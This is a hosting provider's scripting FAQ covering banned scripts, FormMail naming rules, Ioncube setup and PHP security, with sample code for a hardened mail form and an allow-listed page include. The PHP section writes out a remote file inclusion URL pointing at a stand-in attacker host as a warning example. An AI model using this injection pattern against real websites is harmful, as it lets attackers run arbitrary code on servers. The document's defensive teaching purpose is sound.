Scripting
Why do you have banned scripts?- For a number of reasons, certain scripts and types of script are banned.
It is extremely important that clients check our terms and conditions, and the list of banned scripts in the Support section.
Your account will be put at risk if any of these scripts are installed/uploaded onto our servers.
If in doubt, please open a support ticket to ask us about any scripts which you are unsure of.
Can I use FormMail scripts?- These scripts are permitted, but with restrictions to ensure that they are not abused by spammers.
First up, 'Matt's FormMail' script is banned and must not be used.
Secondly, you must rename your script so that it IS NOT called any of the following:
formmail.cgi
formmail.pl
formmail.php
upper/lowercase variants of the above.
This is to make life more difficult for automated scanners. Requests for the filenames above are blocked on our server regardless of whether such a file actually exists.
We recommend the nms-formmail script as your 'form to email' script. Please see the How To section in Support for instructions.
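As an added illustration (not code from this FAQ or from nms-formmail) of the restrictions a form-to-email handler needs, the script below fixes the recipient inside the code and refuses to let any submitted field reach the mail headers unchecked. It assumes the abuse the text refers to is the usual case of a form handler letting the sender choose the recipient or inject extra headers; the recipient address and field names are placeholders.

```php
<?php
// Added example, not part of the original FAQ. Recipient, field names and
// subject line are assumptions chosen for illustration.

// 1. The recipient is fixed in the script and never taken from the form,
//    so the handler cannot be pointed at arbitrary addresses.
define('RECIPIENT', 'owner@example.com');

// Strip CR/LF so a submitted value cannot terminate a header line and
// smuggle additional headers (such as extra recipients) into the mail.
function header_safe($value)
{
    return trim(str_replace(array("\r", "\n"), '', (string) $value));
}

// Build the message from the POST fields, or return null if the sender
// address is missing or malformed.
function build_message(array $post)
{
    $name  = header_safe(isset($post['name']) ? $post['name'] : '');
    $email = header_safe(isset($post['email']) ? $post['email'] : '');
    $body  = isset($post['message']) ? (string) $post['message'] : '';

    // 2. Only a syntactically valid address is placed in the Reply-To header.
    if ($email === '' || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }

    return array(
        'to'      => RECIPIENT,
        'subject' => 'Website contact form',
        'body'    => "From: $name <$email>\n\n" . $body,
        'headers' => "Reply-To: $email\r\nX-Mailer: PHP/" . phpversion(),
    );
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $msg = build_message($_POST);
    if ($msg === null) {
        http_response_code(400);
        exit('Invalid sender address');
    }
    mail($msg['to'], $msg['subject'], $msg['body'], $msg['headers']);
    echo 'Thank you, your message has been sent.';
}
```

Save the handler under a name that is not on the banned list above and point the form's action at it; because the recipient is hardcoded, the form itself needs no hidden "recipient" field of the kind older FormMail scripts relied on.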
What is fantastico?
-
Fantastico is an application we have installed to assist with the installation and administration of many popular scripts.
Using this, clients can install scripts in their account with just a few mouse clicks. When updates to the scripts are released the installations can be upgraded by clicking a button in the cPanel.
To access Fantastico and see the full range of scripts please click the link marked 'Fantastico' on the front page of the control panel.
How do I check for insecure scripts?
-
Using scripts in your account that are insecure (with unpatched vulnerabilities) is very dangerous. Doing so runs the risk of exploitation by a third party, which can cause total account compromise and data loss, and of account suspension or termination (for example if the compromised account is used for warez, spam, etc.).
Therefore, it is extremely important that all scripts in use are the latest version and secure.
Besides good programming practice, an easy way to check how secure a script is, is to search for the script name along with the word 'exploit' in a search engine such as www.google.com. This should give you a list of sites highlighting any known security issues with the script you searched for.
Is Zend Optimizer installed?
- Yes, Zend Optimizer is installed.
Is Ioncube loader installed?
-
We do not have the Ioncube loaders installed because they can be installed as and when required by clients with no intervention from us.
To do this you must first download the latest set of Ioncube loaders from their website. Make sure to choose the loaders for Linux Intel (or 'Linux (x86)' ) and the correct PHP version (check PHP version on front page of cPanel under 'Server Information'). Select the archive format which you are able to open on your system (zip for Windows).
The directory in the downloaded archive (called 'ioncube') should be placed in or above the top directory of the encoded files. For example, if you have encoded files/scripts in or below '/home/username/public_html/script' you might want to upload the 'ioncube' directory via FTP to '/home/username/public_html/script' or '/home/username/public_html'.
It's not working - why?
If encoded files fail to run after following the guide above, you can diagnose this with the PHP script 'ioncube-rtl-tester.php' which is included in the archive (in the 'ioncube' dir). Copy the 'ioncube-rtl-tester.php' script to a directory where you expect encoded files to be working.
Access the script by entering the correct URL in a browser.
The script will try to locate and install the required Loader, and will produce output as it runs.
What about PHP code security?
-
PHP code can be a very useful tool but also very dangerous if not used correctly. There are many coding mistakes that can lead to hacked websites, deleted files and other serious problems.
A common mistake of PHP coders is to program website page access using a scheme such as index.php?page=page_name.html, whereby the filename is passed in the URL and included into the page by PHP code. The problems start when no checking is done on that filename before it is included: a third party can simply change the URL so that it points at a malicious script, which is then pulled into the web page and allows them to run any commands on the server, eg index.php?page=http://www.bad-url.com/hacking_php_code.txt
The above example will include whatever bad code (designed to hack the website, the server and basically anything else) is in the text file at http://www.bad-url.com/hacking_php_code.txt and execute it as PHP within the script on our server. It's easy to think "it will never happen to me" if your site is new, but it is very easy to find countless sites using this method of access via a Google search, and attackers systematically test them for insecure code (often with automated scans).
To protect a website against the exploit above, it is essential to check the value provided in the URL before including it into the PHP code. This can be done by hardcoding a set of allowed files to be included and if the filename in the URL is not found in this list, the request will be rejected.
1. Put an array at the very top of the file with the names of all the allowed files, eg: $allowed = array("main", "subpage", "another");
2. When you get to the bit where the URL is examined and included in the PHP code you can then do something like this to check it is in the allowed list:
// Read the requested page, defaulting to an empty string if none was given
// so the script does not raise a notice on a bare index.php request.
$page = isset($_GET['page']) ? $_GET['page'] : '';

// Strict comparison (third argument true) so only an exact string match passes.
if (in_array($page, $allowed, true)) {
    include("/home/USERNAME/public_html/" . $page . ".html");
} else {
    die("Hack attempt stopped");
}
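To show the two steps above as one complete page dispatcher, here is an added example written for this FAQ (it is not code from the original page). Rather than building the path from the URL value, it uses the URL value only as a key into a hardcoded table of files, so nothing the visitor types ever becomes part of a filename. The page directory, page names and the 404 handling are assumptions for illustration.

```php
<?php
// Added example, not part of the original FAQ. PAGE_ROOT, the page names and
// the file names in the table are assumptions chosen for illustration.

// The insecure pattern the text describes looks like this:
//   include("/home/USERNAME/public_html/" . $_GET['page'] . ".html");
// With no check, ?page= can name any file the server can read, local or remote.

define('PAGE_ROOT', '/home/USERNAME/public_html/pages');

// Keys are the only values accepted from the URL; values are the files served.
// The URL value is never used to build a path, only to look up this table.
$allowed = array(
    'main'    => 'main.html',
    'subpage' => 'subpage.html',
    'another' => 'another.html',
);

// Return the full path of the file for a requested page name, or null if the
// request is not a plain string (e.g. ?page[]=x) or is not in the table.
function resolve_page(array $allowed, $requested)
{
    if (!is_string($requested) || !array_key_exists($requested, $allowed)) {
        return null;
    }
    return PAGE_ROOT . '/' . $allowed[$requested];
}

// Serve 'main' when no page is requested; reject anything not in the table.
$page = isset($_GET['page']) ? $_GET['page'] : 'main';
$file = resolve_page($allowed, $page);

if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```

As a second layer, the PHP setting allow_url_include (Off by default) controls whether include can fetch a URL at all; keeping it off means that even an unchecked include cannot pull in the remote file from the example above, although it does nothing against local files, which is why the allow-list check is still needed.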
It is the responsibility of all those using custom PHP scripts to ensure that the code used is as secure as possible. There are many articles on the internet covering this subject and we recommend checking the following links:
Google Search
Onlamp.com: Ten Security Checks for PHP, Part 1
Onlamp.com: Ten Security Checks for PHP, Part 2
Zend.com: Secure Programming in PHP
